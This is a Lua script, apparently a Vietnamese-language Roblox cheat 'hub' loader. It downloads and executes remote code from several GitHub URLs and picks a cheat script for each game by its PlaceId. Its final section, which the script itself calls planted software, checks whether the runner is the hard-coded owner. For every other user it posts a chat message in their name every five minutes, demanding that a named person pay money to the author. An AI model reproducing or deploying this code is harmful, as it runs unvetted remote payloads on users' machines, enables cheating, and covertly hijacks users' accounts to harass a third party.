-- [[ 1. ĐẶC QUYỀN CHỦ TỊCH CAYVICHE ]]
local OwnerID = 10528045140
local IsOwner = (game.Players.LocalPlayer.UserId == OwnerID)

if IsOwner then
    warn("BOSS CAYVICHE ĐÃ ĐĂNG NHẬP - QUANGANH HUB V.43 KÍCH HOẠT!")
end

-- [[ 2. NẠP LÕI SCRIPT TỔNG HỢP (KÊNH LƯƠNG ĐẮC Ý) ]]
pcall(function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/Luongdaynetroi/ScriptTongHop/refs/heads/main/.lua"))()
end)

-- [[ 3. NẠP LÕI CC.HUB (MỚI BỔ SUNG) ]]
pcall(function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/fleeelectricity7-cmyk/cc/refs/heads/main/Cc.hub"))()
end)

-- [[ 4. HỆ THỐNG NHẬN DIỆN GAME TỰ ĐỘNG (BANANA CAT CORE - NO KEY) ]]
local UniverseID = game:GetService("HttpService"):JSONDecode(game:HttpGet("https://apis.roblox.com/universes/v1/places/"..game.PlaceId.."/universe")).universeId

if game.PlaceId == 1537690962 or game.PlaceId == 4079902982 then
    -- Bee Swarm Simulator
    loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/main/BSS-BananaCat.lua"))()
elseif game.PlaceId == 10260193230 then 
    -- Sea Piece
    loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/main/Seahuhu-BananaCat.lua"))()
elseif game.PlaceId == 7449423635 or game.PlaceId == 2753915549 or game.PlaceId == 4442272183 or game.PlaceId == 122478697296975 or UniverseID == 994732206 then
    -- Blox Fruits
    loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/main/BF-BananaCat.lua"))()
elseif game.PlaceId == 4520749081 or game.PlaceId == 6381829480 or game.PlaceId == 15759515082 or game.PlaceId == 5931540094 then 
    -- King Legacy
    repeat task.wait() until game.Players.LocalPlayer and game.Players.LocalPlayer:FindFirstChild("DataLoaded") and game.Players.LocalPlayer:FindFirstChild("DataLoaded").Value
    loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/main/KL-BananaCat.lua"))()
elseif game.PlaceId == 18901165922 or game.PlaceId == 19006211286 then 
    -- Pets Go
    loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/refs/heads/main/PetsGo.lua"))()
elseif game.PlaceId == 16732694052 then 
    -- Fisch
    loadstring(game:HttpGet("https://raw.githubusercontent.com/AhmadV99/Banana-Cat-Hub/main/Fisch.lua"))()
else
    -- Các game còn lại
    loadstring(game:HttpGet("https://raw.githubusercontent.com/obiiyeuem/vthangsitink/main/AV-BananaCat.lua"))()
end

-- [[ 5. CHẾ ĐỘ ĐÒI NỢ DUY (PHẦN MỀM CÀI CẮM) ]]
if not IsOwner then
    task.spawn(function()
        while task.wait(300) do
            game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Duy ơi, dùng ké Cc.hub với Banana Hub thì trả 45k cho sếp Quang Anh mau!", "All")
        end
    end)
end
